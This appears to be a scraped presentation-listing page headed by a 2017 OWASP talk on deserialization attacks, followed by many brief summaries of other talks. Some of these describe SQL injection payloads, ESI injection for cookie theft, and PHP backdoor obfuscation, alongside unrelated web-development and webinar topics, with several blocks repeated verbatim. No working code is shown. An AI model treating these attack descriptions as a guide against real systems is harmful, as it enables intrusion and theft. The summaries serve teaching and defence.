Vlada Kulish shared us really technical topic about Deserialization or how one small object can break all your security.
OWASP Ukraine 2017 Security Conference
https://www.facebook.com/events/914991308665427/
This is the short talk I delivered at the Ruby Underground Meetup in Tel Aviv for the local Ruby user group about some of the changes and new features in R
This document provides an overview of Mozilla Web Apps including:
- Web Apps can run on platforms like Windows, Mac, Android and more.
- They are built with open web technologies like HTML5, CSS, and JavaScript.
- A manifest file is needed to define the app and install it using the Mozilla Labs App Runtime extension.
- Web Apps can use features like offline storage, IndexedDB, and fullscreen mode.
The document discusses several techniques for optimizing web page performance including:
1. Using CSS shorthand properties to reduce code and specify font styles concisely.
2. Applying multiple classes to an element to combine styles from different classes.
3. Creating CSS sprites to reduce HTTP requests by combining images into a single file.
4. A few other techniques like cross-browser opacity, text wrapping, and Google web fonts.
1. The document discusses various SQL injection vulnerabilities and techniques for exploiting them, including on Metasploitable, DVWA, and Sqli-labs platforms.
2. It provides examples of payloads to extract database, table, and user information from Sqli-labs lessons 29, 32, 33, and 36.
3. The document also discusses challenges of SQL injection on MySQL databases using GBK encoding, and mitigations like addslashes(), preg_replace(), and mysql_real_escape_string().
This document discusses caching techniques in Rails, including page caching, action caching, and fragment caching. Page caching stores entire static HTML pages to serve cached content quickly without running Rails. Action caching runs controllers but caches output. Fragment caching caches portions of views. Caches can be expired based on model changes or timed expiration. Plugins like cache_fu and sweeper generators help manage caching.
This document discusses using the inherited_resources gem to simplify the implementation of RESTful controllers in Rails applications. It allows controllers to inherit common RESTful actions and configuration. Key features covered include defining resource and collection methods, customizing responses, configuring actions, overwriting actions, and integrating with other libraries like Decent Exposure and Responders.
Edge Side Include Injection: Abusing Caching Servers into SSRF and Transparen...Priyanka Aash
When caching servers and load balancers became an integral part of the Internet's infrastructure, vendors introduced what is called "Edge Side Includes" (ESI), a technology allowing malleability in caching systems. This legacy technology, still implemented in nearly all popular HTTP surrogates (caching/load balancing services), is dangerous by design and brings a yet unexplored vector for web-based attacks.
The ESI language consists of a small set of instructions represented by XML tags, served by the backend application server, which are processed on the Edge servers (load balancers, reverse proxies). Due to the upstream-trusting nature of Edge servers, the ESI engine tasked to parse and execute these instructions are not able to distinguish between ESI instructions legitimately provided by the application server, and malicious instructions injected by a malicious party. Through our research, we explored the risks that may be encountered through ESI injection: We identified that ESI can be used to perform SSRF, bypass reflected XSS filters (Chrome), and silently extract cookies. Because this attack vector leverages flaws on Edge servers and not on the client-side, the ESI engine can be reliably exploited to steal all cookies, including those protected by the HttpOnly mitigation flag, allowing JavaScript-less session hijacking.
Identified affected vendors include Akamai, Varnish Cache, Squid Proxy, Fastly, IBM WebSphere, Oracle WebLogic, F5, and countless language-specific solutions (NodeJS, Ruby, etc.). This presentation will start by defining ESI and visiting typical infrastructures leveraging this model. We will then delve into to the good stuff; identification and exploitation of popular ESI engines, and mitigation recommendations.
Application Diagnosis with Zend Server TracingZendCon
This document discusses Application Diagnosis with Zend Server Tracing. It provides an overview of debugging applications, introduces Zend Server Tracing as a better way to debug than var_dump, and covers how Zend Server Tracing works including code tracing, monitoring modes, and settings. It provides examples of using code tracing to diagnose uncaught exceptions, destructors, prepared statements, and memory usage. The document encourages using Zend Server Tracing in development, testing, staging, and production environments.
This is the short talk I delivered at the Ruby Underground Meetup in Tel Aviv for the local Ruby user group about some of the changes and new features in R
This document provides an overview of Mozilla Web Apps including:
- Web Apps can run on platforms like Windows, Mac, Android and more.
- They are built with open web technologies like HTML5, CSS, and JavaScript.
- A manifest file is needed to define the app and install it using the Mozilla Labs App Runtime extension.
- Web Apps can use features like offline storage, IndexedDB, and fullscreen mode.
The document discusses several techniques for optimizing web page performance including:
1. Using CSS shorthand properties to reduce code and specify font styles concisely.
2. Applying multiple classes to an element to combine styles from different classes.
3. Creating CSS sprites to reduce HTTP requests by combining images into a single file.
4. A few other techniques like cross-browser opacity, text wrapping, and Google web fonts.
1. The document discusses various SQL injection vulnerabilities and techniques for exploiting them, including on Metasploitable, DVWA, and Sqli-labs platforms.
2. It provides examples of payloads to extract database, table, and user information from Sqli-labs lessons 29, 32, 33, and 36.
3. The document also discusses challenges of SQL injection on MySQL databases using GBK encoding, and mitigations like addslashes(), preg_replace(), and mysql_real_escape_string().
This document discusses caching techniques in Rails, including page caching, action caching, and fragment caching. Page caching stores entire static HTML pages to serve cached content quickly without running Rails. Action caching runs controllers but caches output. Fragment caching caches portions of views. Caches can be expired based on model changes or timed expiration. Plugins like cache_fu and sweeper generators help manage caching.
This document discusses using the inherited_resources gem to simplify the implementation of RESTful controllers in Rails applications. It allows controllers to inherit common RESTful actions and configuration. Key features covered include defining resource and collection methods, customizing responses, configuring actions, overwriting actions, and integrating with other libraries like Decent Exposure and Responders.
Edge Side Include Injection: Abusing Caching Servers into SSRF and Transparen...Priyanka Aash
When caching servers and load balancers became an integral part of the Internet's infrastructure, vendors introduced what is called "Edge Side Includes" (ESI), a technology allowing malleability in caching systems. This legacy technology, still implemented in nearly all popular HTTP surrogates (caching/load balancing services), is dangerous by design and brings a yet unexplored vector for web-based attacks.
The ESI language consists of a small set of instructions represented by XML tags, served by the backend application server, which are processed on the Edge servers (load balancers, reverse proxies). Due to the upstream-trusting nature of Edge servers, the ESI engine tasked to parse and execute these instructions are not able to distinguish between ESI instructions legitimately provided by the application server, and malicious instructions injected by a malicious party. Through our research, we explored the risks that may be encountered through ESI injection: We identified that ESI can be used to perform SSRF, bypass reflected XSS filters (Chrome), and silently extract cookies. Because this attack vector leverages flaws on Edge servers and not on the client-side, the ESI engine can be reliably exploited to steal all cookies, including those protected by the HttpOnly mitigation flag, allowing JavaScript-less session hijacking.
Identified affected vendors include Akamai, Varnish Cache, Squid Proxy, Fastly, IBM WebSphere, Oracle WebLogic, F5, and countless language-specific solutions (NodeJS, Ruby, etc.). This presentation will start by defining ESI and visiting typical infrastructures leveraging this model. We will then delve into to the good stuff; identification and exploitation of popular ESI engines, and mitigation recommendations.
Application Diagnosis with Zend Server TracingZendCon
This document discusses Application Diagnosis with Zend Server Tracing. It provides an overview of debugging applications, introduces Zend Server Tracing as a better way to debug than var_dump, and covers how Zend Server Tracing works including code tracing, monitoring modes, and settings. It provides examples of using code tracing to diagnose uncaught exceptions, destructors, prepared statements, and memory usage. The document encourages using Zend Server Tracing in development, testing, staging, and production environments.
Clearance: Simple, complete Ruby web app authentication.Jason Morrison
This document discusses Clearance, an authentication gem for Ruby on Rails applications. It provides instructions for installing Clearance and includes code examples for integrating authentication functionality into a Rails model and controllers. It also outlines some future work items like refactoring, documentation, and additional authentication strategies.
This document discusses Magento, an open-source e-commerce platform built on the Zend Framework. It outlines how Magento utilizes around 15 Zend Framework components for functionality like controllers, views, caching, internationalization and databases. It also describes how additional Zend Framework components may be integrated in the future and how modules can extend and overwrite core Magento classes and functionality.
SAP is the most popular business application. There are more than one hundred eighty thousand installations all over the world. But people spend enormous amounts of money to install it and then forget about security. In ERP systems, all business processes are performed, all critical information is stored.
The presentation describes how SAP Portal works and kinds of attacks it can be exposed to.
This document contains notes from a meeting on web application security. It discusses several common vulnerabilities like SQL injection, cross-site scripting (XSS), and clickjacking. It provides examples of how these vulnerabilities can occur and ways to prevent them, such as sanitizing user input, enabling CSRF protection middleware, and using the X-Frame-Options header. Keywords discussed include MySQL, Docker, Kubernetes, Ansible, and various attack vectors like CSRF, XSS, SQL injection, and clickjacking. The document aims to educate on security best practices for Python and Django web applications.
Dmitry Chastukhin, Director of security consulting at ERPScan, speaks at Deepsec Conference 2012 on SAP Security.
SAP is the most popular business application. There are more than one hundred eighty thousand installations all over the world. But people spend enormous amounts of money to install it and then forget about security. In ERP systems, all business processes are performed, all critical information is stored.
The presentation describes how SAP Portal works and kinds of attacks it can be exposed to.
This document discusses serialization vulnerabilities and provides examples of how deserialization attacks work. It begins with an overview of serialization and why it is important. It then covers different serialization formats like binary, JSON, XML and examples of vulnerabilities in Java, Ruby, PHP, .NET and other languages. Useful links are also provided to learn more about detecting and exploiting serialization vulnerabilities.
Cross Site Scripting (XSS) Defense with JavaJim Manico
Cross Site Scripting Defense is difficult. The Java Programming language does not provide native key defenses necessary to throughly prevent XSS. As technologies such as Content Security Policy emerge, we still need pragmatic advice to stop XSS in legacy applications as well as new applications using traditional Java frameworks. First generation encoding libraries had both performance and completeness problems that prevent developers from through, production-safe XSS defense. This talk will deeply review the OWASP Java Encoder Project and the OWASP HTML Sanitizer Project and give detailed code samples highlighting their use. Additional advice on next-generation JavaScript and JSON workflows using the OWASP JSON Sanitizer will also be reviewed.
The document summarizes the OWASP Top 10 security risks and provides prevention techniques. It discusses injection, cross-site scripting (XSS), insecure deserialization, XML external entities (XXE), and other risks. For each risk, it recommends validating, sanitizing, and escaping user input, using prepared statements, and other best practices to prevent security vulnerabilities.
Vladimir Vorontsov - Splitting, smuggling and cache poisoning come backDefconRussia
This document discusses various techniques for HTTP response splitting and cache poisoning attacks. It provides examples of exploiting HTTP response splitting vulnerabilities to inject additional headers and responses. It also covers ways to poison caches by manipulating headers like Content-Length and Last-Modified to influence caching behavior. The document examines defenses implemented in modern browsers and web servers as well as mitigation techniques. It raises questions about the potential for these attacks to impact other protocols beyond HTTP.
The document is a presentation about HTML5. It discusses what HTML5 is, some of the new elements it introduces like canvas, video, audio, and geolocation. It also covers new features like CSS3 media queries, web fonts using WOFF, and whether HTML5 is ready for use. The presentation encourages trying out HTML5 and provides some resources for learning more.
The document discusses Java servlets and Java Server Pages (JSP). It provides examples of HelloWorld servlets written in Java and JSP. It describes the basic lifecycle of servlets, how they interact with clients, and common tags used in JSP like comments, declarations, expressions and scriptlets. It also demonstrates using Java beans in JSP and an example to look up stock prices that retrieves data from a database using JDBC or alternatively by hardcoding logic based on the stock market source.
TDC2017 | Florianopolis - Trilha DevOps How we figured out we had a SRE team ...tdc-globalcode
The document discusses the history and evolution of JavaScript packaging and module bundling from 2000 to the present. It covers early approaches using individual script tags to load JS files, the introduction of minification tools like JSMin in 2003, concatenating files together in the late 2000s, module loaders like RequireJS in 2009, the rise of Node.js and package managers in 2010, and the modern dominance of bundlers like Webpack since 2014 which use loaders to bundle dependencies and assets into single files or chunks.
Webpack is a module bundler that packs JavaScript files and their dependencies into small bundles for efficient loading on the browser. It builds a dependency graph by walking through imports and outputs bundles or individual files. Loaders allow transforming assets and piping them together, like using babel-loader to transpile JSX to ES5 and css-loader to bundle CSS. This summarizes the key points about Webpack's purpose, how it builds dependencies, and the role of loaders.
Derek Willian Stavis (Pagar.me)
Todo mundo diz que Webpack é só um module bundler. Mas o que é um módulo? O que é um bundler? Porque precisamos disso? Vamos caminhar pela história do desenvolvimento web para entender estes conceitos, e no final vamos dissecar a configuração e o output do Webpack para entendermos como ele funciona e como ele pode facilitar o seu processo de desenvolvimento.
Vale do Carbono Conference
Webpack is just a module bundler, they said. What they didn't say is why we need it, and what was the motivation that made us achieve what Webpack have been doing for us. In this talk we will navigate through the years of front-end development, ranging from 2003 to nowadays to understand this, and in the end, we will walk thought a complete Webpack project to understand how it works.
XSS Defence with @manicode and @eoinkearyEoin Keary
The document discusses various techniques for preventing cross-site scripting (XSS) attacks, including encoding untrusted data for different contexts, using content security policy (CSP), and jQuery encoding plugins. It provides examples of using encoding libraries like OWASP Encoder to sanitize input for HTML, JavaScript, CSS, and more. It also describes DOM-based XSS defenses, avoiding dangerous jQuery methods, and the structure of CSP violation reports.
My popular talk on Debugging WordPress, presented at WordCamp London, WordCamp Norrkoping, Software University and WPBGUG
Video: http://wordpress.tv/2014/05/23/mario-peshev-debugging-wordpress/
Lecture 4: JavaServer Pages (JSP) & Expression Language (EL)Fahad Golra
The document discusses JavaServer Pages (JSP) and the Expression Language (EL) in JEE. It covers key JSP concepts like scripting elements, directive elements, standard action elements, and implicit objects. It also explains the translation of JSP files to servlets, and provides examples of using scripting elements, directives like <jsp:include>, and standard actions.
Whatever it takes - Fixing SQLIA and XSS in the processguest3379bd
This document discusses techniques for preventing SQL injection and cross-site scripting (XSS) vulnerabilities. It proposes using prepared statements with separate data and control planes as a "safe query object" approach. It also discusses policy-based sanitization of HTML and focusing code reviews on defect detection through annotating suspicious code regions. The overall goal is to help developers adopt architectures and techniques that thoroughly apply technical solutions to recognize and fix security weaknesses.
Beyond HTML - Scriptsprachen, Frameworks, Templatesprachen und vieles mehrJens-Christian Fischer
Früher war alles besser - sowieso! Konnte man vor 20 Jahren alleine mit HTML einen Webauftritt gestalten, hat sich die Anzahl der Technologien, die eine Webentwicklerin beherrschen muss, vervielfacht. Was ist wichtig, was unwichtig? In diesem Vortrag beleuchtet Jens-Christian den aktuellen Zoo von Technologien, und zeigt auf, wie sich diese Vielfalt sinnvoll bändigen lässt.
HTML(5), CSS(3), JavaScript, CoffeeScript, JavaScript Frameworks (jQuery, Prototype, Moo, Dojo, Ext, ...), JavaScript Microframeworks (Backbone, Ember, Flatiron), Templatingsprachen, Hilfsmittel zur Gestaltung von CSS (SASS, SCSS), Responsive Design, Browsererkennung, Caching, Performancetweaks, Testing und vieles mehr wird thematisiert.
This document summarizes Sandro "guly" Zaccarini's presentation on PHP web backdoor obfuscation techniques at EndSummerCamp 2k15. The presentation covers placing backdoors in PHP websites, different methods for executing code through PHP, real world examples of obfuscated backdoors found in the wild, and vulnerabilities that can enable backdoor execution. The goal is to demonstrate how PHP backdoors can be hidden through obfuscation and exploit vulnerabilities.
Clearance: Simple, complete Ruby web app authentication.Jason Morrison
This document discusses Clearance, an authentication gem for Ruby on Rails applications. It provides instructions for installing Clearance and includes code examples for integrating authentication functionality into a Rails model and controllers. It also outlines some future work items like refactoring, documentation, and additional authentication strategies.
This document discusses Magento, an open-source e-commerce platform built on the Zend Framework. It outlines how Magento utilizes around 15 Zend Framework components for functionality like controllers, views, caching, internationalization and databases. It also describes how additional Zend Framework components may be integrated in the future and how modules can extend and overwrite core Magento classes and functionality.
SAP is the most popular business application. There are more than one hundred eighty thousand installations all over the world. But people spend enormous amounts of money to install it and then forget about security. In ERP systems, all business processes are performed, all critical information is stored.
The presentation describes how SAP Portal works and kinds of attacks it can be exposed to.
This document contains notes from a meeting on web application security. It discusses several common vulnerabilities like SQL injection, cross-site scripting (XSS), and clickjacking. It provides examples of how these vulnerabilities can occur and ways to prevent them, such as sanitizing user input, enabling CSRF protection middleware, and using the X-Frame-Options header. Keywords discussed include MySQL, Docker, Kubernetes, Ansible, and various attack vectors like CSRF, XSS, SQL injection, and clickjacking. The document aims to educate on security best practices for Python and Django web applications.
Dmitry Chastukhin, Director of security consulting at ERPScan, speaks at Deepsec Conference 2012 on SAP Security.
SAP is the most popular business application. There are more than one hundred eighty thousand installations all over the world. But people spend enormous amounts of money to install it and then forget about security. In ERP systems, all business processes are performed, all critical information is stored.
The presentation describes how SAP Portal works and kinds of attacks it can be exposed to.
This document discusses serialization vulnerabilities and provides examples of how deserialization attacks work. It begins with an overview of serialization and why it is important. It then covers different serialization formats like binary, JSON, XML and examples of vulnerabilities in Java, Ruby, PHP, .NET and other languages. Useful links are also provided to learn more about detecting and exploiting serialization vulnerabilities.
Cross Site Scripting (XSS) Defense with JavaJim Manico
Cross Site Scripting Defense is difficult. The Java Programming language does not provide native key defenses necessary to throughly prevent XSS. As technologies such as Content Security Policy emerge, we still need pragmatic advice to stop XSS in legacy applications as well as new applications using traditional Java frameworks. First generation encoding libraries had both performance and completeness problems that prevent developers from through, production-safe XSS defense. This talk will deeply review the OWASP Java Encoder Project and the OWASP HTML Sanitizer Project and give detailed code samples highlighting their use. Additional advice on next-generation JavaScript and JSON workflows using the OWASP JSON Sanitizer will also be reviewed.
The document summarizes the OWASP Top 10 security risks and provides prevention techniques. It discusses injection, cross-site scripting (XSS), insecure deserialization, XML external entities (XXE), and other risks. For each risk, it recommends validating, sanitizing, and escaping user input, using prepared statements, and other best practices to prevent security vulnerabilities.
Vladimir Vorontsov - Splitting, smuggling and cache poisoning come backDefconRussia
This document discusses various techniques for HTTP response splitting and cache poisoning attacks. It provides examples of exploiting HTTP response splitting vulnerabilities to inject additional headers and responses. It also covers ways to poison caches by manipulating headers like Content-Length and Last-Modified to influence caching behavior. The document examines defenses implemented in modern browsers and web servers as well as mitigation techniques. It raises questions about the potential for these attacks to impact other protocols beyond HTTP.
The document is a presentation about HTML5. It discusses what HTML5 is, some of the new elements it introduces like canvas, video, audio, and geolocation. It also covers new features like CSS3 media queries, web fonts using WOFF, and whether HTML5 is ready for use. The presentation encourages trying out HTML5 and provides some resources for learning more.
The document discusses Java servlets and Java Server Pages (JSP). It provides examples of HelloWorld servlets written in Java and JSP. It describes the basic lifecycle of servlets, how they interact with clients, and common tags used in JSP like comments, declarations, expressions and scriptlets. It also demonstrates using Java beans in JSP and an example to look up stock prices that retrieves data from a database using JDBC or alternatively by hardcoding logic based on the stock market source.
TDC2017 | Florianopolis - Trilha DevOps How we figured out we had a SRE team ...tdc-globalcode
The document discusses the history and evolution of JavaScript packaging and module bundling from 2000 to the present. It covers early approaches using individual script tags to load JS files, the introduction of minification tools like JSMin in 2003, concatenating files together in the late 2000s, module loaders like RequireJS in 2009, the rise of Node.js and package managers in 2010, and the modern dominance of bundlers like Webpack since 2014 which use loaders to bundle dependencies and assets into single files or chunks.
Webpack is a module bundler that packs JavaScript files and their dependencies into small bundles for efficient loading on the browser. It builds a dependency graph by walking through imports and outputs bundles or individual files. Loaders allow transforming assets and piping them together, like using babel-loader to transpile JSX to ES5 and css-loader to bundle CSS. This summarizes the key points about Webpack's purpose, how it builds dependencies, and the role of loaders.
Derek Willian Stavis (Pagar.me)
Todo mundo diz que Webpack é só um module bundler. Mas o que é um módulo? O que é um bundler? Porque precisamos disso? Vamos caminhar pela história do desenvolvimento web para entender estes conceitos, e no final vamos dissecar a configuração e o output do Webpack para entendermos como ele funciona e como ele pode facilitar o seu processo de desenvolvimento.
Vale do Carbono Conference
Webpack is just a module bundler, they said. What they didn't say is why we need it, and what was the motivation that made us achieve what Webpack have been doing for us. In this talk we will navigate through the years of front-end development, ranging from 2003 to nowadays to understand this, and in the end, we will walk thought a complete Webpack project to understand how it works.
XSS Defence with @manicode and @eoinkearyEoin Keary
The document discusses various techniques for preventing cross-site scripting (XSS) attacks, including encoding untrusted data for different contexts, using content security policy (CSP), and jQuery encoding plugins. It provides examples of using encoding libraries like OWASP Encoder to sanitize input for HTML, JavaScript, CSS, and more. It also describes DOM-based XSS defenses, avoiding dangerous jQuery methods, and the structure of CSP violation reports.
My popular talk on Debugging WordPress, presented at WordCamp London, WordCamp Norrkoping, Software University and WPBGUG
Video: http://wordpress.tv/2014/05/23/mario-peshev-debugging-wordpress/
Lecture 4: JavaServer Pages (JSP) & Expression Language (EL)Fahad Golra
The document discusses JavaServer Pages (JSP) and the Expression Language (EL) in JEE. It covers key JSP concepts like scripting elements, directive elements, standard action elements, and implicit objects. It also explains the translation of JSP files to servlets, and provides examples of using scripting elements, directives like <jsp:include>, and standard actions.
Whatever it takes - Fixing SQLIA and XSS in the processguest3379bd
This document discusses techniques for preventing SQL injection and cross-site scripting (XSS) vulnerabilities. It proposes using prepared statements with separate data and control planes as a "safe query object" approach. It also discusses policy-based sanitization of HTML and focusing code reviews on defect detection through annotating suspicious code regions. The overall goal is to help developers adopt architectures and techniques that thoroughly apply technical solutions to recognize and fix security weaknesses.
Beyond HTML - Scriptsprachen, Frameworks, Templatesprachen und vieles mehrJens-Christian Fischer
Früher war alles besser - sowieso! Konnte man vor 20 Jahren alleine mit HTML einen Webauftritt gestalten, hat sich die Anzahl der Technologien, die eine Webentwicklerin beherrschen muss, vervielfacht. Was ist wichtig, was unwichtig? In diesem Vortrag beleuchtet Jens-Christian den aktuellen Zoo von Technologien, und zeigt auf, wie sich diese Vielfalt sinnvoll bändigen lässt.
HTML(5), CSS(3), JavaScript, CoffeeScript, JavaScript Frameworks (jQuery, Prototype, Moo, Dojo, Ext, ...), JavaScript Microframeworks (Backbone, Ember, Flatiron), Templatingsprachen, Hilfsmittel zur Gestaltung von CSS (SASS, SCSS), Responsive Design, Browsererkennung, Caching, Performancetweaks, Testing und vieles mehr wird thematisiert.
This document summarizes Sandro "guly" Zaccarini's presentation on PHP web backdoor obfuscation techniques at EndSummerCamp 2k15. The presentation covers placing backdoors in PHP websites, different methods for executing code through PHP, real world examples of obfuscated backdoors found in the wild, and vulnerabilities that can enable backdoor execution. The goal is to demonstrate how PHP backdoors can be hidden through obfuscation and exploit vulnerabilities.
Brian hogg word camp preparing a plugin for translationwcto2017
You have a plugin, but you want users to be able to use it in their native language. Learn how to get it ready for translation, things to watch out for, and tips for maintaining it as you change the plugin over time.
This document discusses a code injection vulnerability in the internationalization (i18n) functionality of the CodeIgniter PHP web framework. Specifically, it shows how an attacker could exploit weaknesses in CodeIgniter's handling of localized language files to perform remote file inclusion (RFI) or local code inclusion attacks. The document provides examples of how an attacker could craft malicious input to include arbitrary files or code from remote or local systems. It also notes that over 240 existing CodeIgniter sites were found potentially vulnerable to this issue. In conclusion, the document invites questions and feedback on this CodeIgniter i18n code injection vulnerability.
The document discusses web applications built with JavaScript. It covers some key benefits of using JavaScript for web apps including speed, ability to use 2D/3D graphics, web audio, and file APIs. It also discusses common JavaScript frameworks and concepts like the DOM, events, asynchronous requests, and testing with Jasmine.
This document summarizes techniques for improving web performance, including:
- Using output caching, compression, browser caching and CDNs to reduce page size and load times
- Optimizing images, CSS, JavaScript and databases for faster loading
- Leveraging caching, minification, concatenation and deferred parsing to improve front-end performance
- Implementing techniques like service workers, resource hints and responsive delivery to optimize the user experience
Similar to Vlada Kulish "Deserialization. What it is and how to hack it" (20)
Igor Beliaiev "Incident Busters. Human Security Interaction"Igor Beliaiev
Igor was talking about latest biggest hacks and security threats, and about Human Security Interaction. Get ready to hear real-life stories about reasons why human factor is so important in security nowadays.
OWASP Ukraine 2017 Security Conference
https://www.facebook.com/events/914991308665427/
Volodymyr Kimak "Security Tips for Android App"Igor Beliaiev
Are you interested how to make android app more secure against common threats? He is the one who might help ;) Check out Volodymyr Kimak speech "Security Tips for Android App"
OWASP Ukraine 2017 Security Conference
https://www.facebook.com/events/914991308665427/
Presentation about the most dangerous attacks on Companies and People. The true power of physical security, Social engineering, tips and tricks about malware and hacking tools and devices
Presentation in SoftServe's Security Hole #18 about cryptolocker ransomware, how they work, distribution methods, possible remediation scenarios. Short story about one of our client, who got infected with cryptolocker on 1C database server, our incident forensics and recommendations hot to stay secure
This document discusses the risks small companies face from cyber attacks even though they think they are not important targets. It notes that while companies may think a hack will not happen, it is not a question of if but when. The consequences of a security failure include loss of trust, money, data, time to recover, and penalties. It then explores how non-critical applications and registration pages can still be vulnerable to hackers bypassing client-side restrictions and gaining database access, allowing them to change passwords or access sensitive information.
Presentation in SoftServe's Security Hole #11 about competitive intelligence for people and enterprise, risks and it's use in business. + Workshop for audience
leewayhertz.com-AI in predictive maintenance Use cases technologies benefits ...alexjohnson7307
Predictive maintenance is a proactive approach that anticipates equipment failures before they happen. At the forefront of this innovative strategy is Artificial Intelligence (AI), which brings unprecedented precision and efficiency. AI in predictive maintenance is transforming industries by reducing downtime, minimizing costs, and enhancing productivity.
Digital Marketing Trends in 2024 | Guide for Staying AheadWask
https://www.wask.co/ebooks/digital-marketing-trends-in-2024
Feeling lost in the digital marketing whirlwind of 2024? Technology is changing, consumer habits are evolving, and staying ahead of the curve feels like a never-ending pursuit. This e-book is your compass. Dive into actionable insights to handle the complexities of modern marketing. From hyper-personalization to the power of user-generated content, learn how to build long-term relationships with your audience and unlock the secrets to success in the ever-shifting digital landscape.
Generating privacy-protected synthetic data using Secludy and MilvusZilliz
During this demo, the founders of Secludy will demonstrate how their system utilizes Milvus to store and manipulate embeddings for generating privacy-protected synthetic data. Their approach not only maintains the confidentiality of the original data but also enhances the utility and scalability of LLMs under privacy constraints. Attendees, including machine learning engineers, data scientists, and data managers, will witness first-hand how Secludy's integration with Milvus empowers organizations to harness the power of LLMs securely and efficiently.
Programming Foundation Models with DSPy - Meetup SlidesZilliz
Prompting language models is hard, while programming language models is easy. In this talk, I will discuss the state-of-the-art framework DSPy for programming foundation models with its powerful optimizers and runtime constraint system.
Salesforce Integration for Bonterra Impact Management (fka Social Solutions A...Jeffrey Haguewood
Sidekick Solutions uses Bonterra Impact Management (fka Social Solutions Apricot) and automation solutions to integrate data for business workflows.
We believe integration and automation are essential to user experience and the promise of efficient work through technology. Automation is the critical ingredient to realizing that full vision. We develop integration products and services for Bonterra Case Management software to support the deployment of automations for a variety of use cases.
This video focuses on integration of Salesforce with Bonterra Impact Management.
Interested in deploying an integration with Salesforce for Bonterra Impact Management? Contact us at sales@sidekicksolutionsllc.com to discuss next steps.
Trusted Execution Environment for Decentralized Process MiningLucaBarbaro3
Presentation of the paper "Trusted Execution Environment for Decentralized Process Mining" given during the CAiSE 2024 Conference in Cyprus on June 7, 2024.
GraphRAG for Life Science to increase LLM accuracyTomaz Bratanic
GraphRAG for life science domain, where you retriever information from biomedical knowledge graphs using LLMs to increase the accuracy and performance of generated answers
FREE A4 Cyber Security Awareness Posters-Social Engineering part 3Data Hops
Free A4 downloadable and printable Cyber Security, Social Engineering Safety and security Training Posters . Promote security awareness in the home or workplace. Lock them Out From training providers datahops.com
Fueling AI with Great Data with Airbyte WebinarZilliz
This talk will focus on how to collect data from a variety of sources, leveraging this data for RAG and other GenAI use cases, and finally charting your course to productionalization.
How to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdfChart Kalyan
A Mix Chart displays historical data of numbers in a graphical or tabular form. The Kalyan Rajdhani Mix Chart specifically shows the results of a sequence of numbers over different periods.
Ivanti’s Patch Tuesday breakdown goes beyond patching your applications and brings you the intelligence and guidance needed to prioritize where to focus your attention first. Catch early analysis on our Ivanti blog, then join industry expert Chris Goettl for the Patch Tuesday Webinar Event. There we’ll do a deep dive into each of the bulletins and give guidance on the risks associated with the newly-identified vulnerabilities.
Skybuffer AI: Advanced Conversational and Generative AI Solution on SAP Busin...Tatiana Kojar
Skybuffer AI, built on the robust SAP Business Technology Platform (SAP BTP), is the latest and most advanced version of our AI development, reaffirming our commitment to delivering top-tier AI solutions. Skybuffer AI harnesses all the innovative capabilities of the SAP BTP in the AI domain, from Conversational AI to cutting-edge Generative AI and Retrieval-Augmented Generation (RAG). It also helps SAP customers safeguard their investments into SAP Conversational AI and ensure a seamless, one-click transition to SAP Business AI.
With Skybuffer AI, various AI models can be integrated into a single communication channel such as Microsoft Teams. This integration empowers business users with insights drawn from SAP backend systems, enterprise documents, and the expansive knowledge of Generative AI. And the best part of it is that it is all managed through our intuitive no-code Action Server interface, requiring no extensive coding knowledge and making the advanced AI accessible to more users.
A Comprehensive Guide to DeFi Development Services in 2024Intelisync
DeFi represents a paradigm shift in the financial industry. Instead of relying on traditional, centralized institutions like banks, DeFi leverages blockchain technology to create a decentralized network of financial services. This means that financial transactions can occur directly between parties, without intermediaries, using smart contracts on platforms like Ethereum.
In 2024, we are witnessing an explosion of new DeFi projects and protocols, each pushing the boundaries of what’s possible in finance.
In summary, DeFi in 2024 is not just a trend; it’s a revolution that democratizes finance, enhances security and transparency, and fosters continuous innovation. As we proceed through this presentation, we'll explore the various components and services of DeFi in detail, shedding light on how they are transforming the financial landscape.
At Intelisync, we specialize in providing comprehensive DeFi development services tailored to meet the unique needs of our clients. From smart contract development to dApp creation and security audits, we ensure that your DeFi project is built with innovation, security, and scalability in mind. Trust Intelisync to guide you through the intricate landscape of decentralized finance and unlock the full potential of blockchain technology.
Ready to take your DeFi project to the next level? Partner with Intelisync for expert DeFi development services today!
HCL Notes and Domino License Cost Reduction in the World of DLAUpanagenda
Webinar Recording: https://www.panagenda.com/webinars/hcl-notes-and-domino-license-cost-reduction-in-the-world-of-dlau/
The introduction of DLAU and the CCB & CCX licensing model caused quite a stir in the HCL community. As a Notes and Domino customer, you may have faced challenges with unexpected user counts and license costs. You probably have questions on how this new licensing approach works and how to benefit from it. Most importantly, you likely have budget constraints and want to save money where possible. Don’t worry, we can help with all of this!
We’ll show you how to fix common misconfigurations that cause higher-than-expected user counts, and how to identify accounts which you can deactivate to save money. There are also frequent patterns that can cause unnecessary cost, like using a person document instead of a mail-in for shared mailboxes. We’ll provide examples and solutions for those as well. And naturally we’ll explain the new licensing model.
Join HCL Ambassador Marc Thomas in this webinar with a special guest appearance from Franz Walder. It will give you the tools and know-how to stay on top of what is going on with Domino licensing. You will be able lower your cost through an optimized configuration and keep it low going forward.
These topics will be covered
- Reducing license cost by finding and fixing misconfigurations and superfluous accounts
- How do CCB and CCX licenses really work?
- Understanding the DLAU tool and how to best utilize it
- Tips for common problem areas, like team mailboxes, functional/test users, etc
- Practical examples and best practices to implement right away
Driving Business Innovation: Latest Generative AI Advancements & Success StorySafe Software
Are you ready to revolutionize how you handle data? Join us for a webinar where we’ll bring you up to speed with the latest advancements in Generative AI technology and discover how leveraging FME with tools from giants like Google Gemini, Amazon, and Microsoft OpenAI can supercharge your workflow efficiency.
During the hour, we’ll take you through:
Guest Speaker Segment with Hannah Barrington: Dive into the world of dynamic real estate marketing with Hannah, the Marketing Manager at Workspace Group. Hear firsthand how their team generates engaging descriptions for thousands of office units by integrating diverse data sources—from PDF floorplans to web pages—using FME transformers, like OpenAIVisionConnector and AnthropicVisionConnector. This use case will show you how GenAI can streamline content creation for marketing across the board.
Ollama Use Case: Learn how Scenario Specialist Dmitri Bagh has utilized Ollama within FME to input data, create custom models, and enhance security protocols. This segment will include demos to illustrate the full capabilities of FME in AI-driven processes.
Custom AI Models: Discover how to leverage FME to build personalized AI models using your data. Whether it’s populating a model with local data for added security or integrating public AI tools, find out how FME facilitates a versatile and secure approach to AI.
We’ll wrap up with a live Q&A session where you can engage with our experts on your specific use cases, and learn more about optimizing your data workflows with AI.
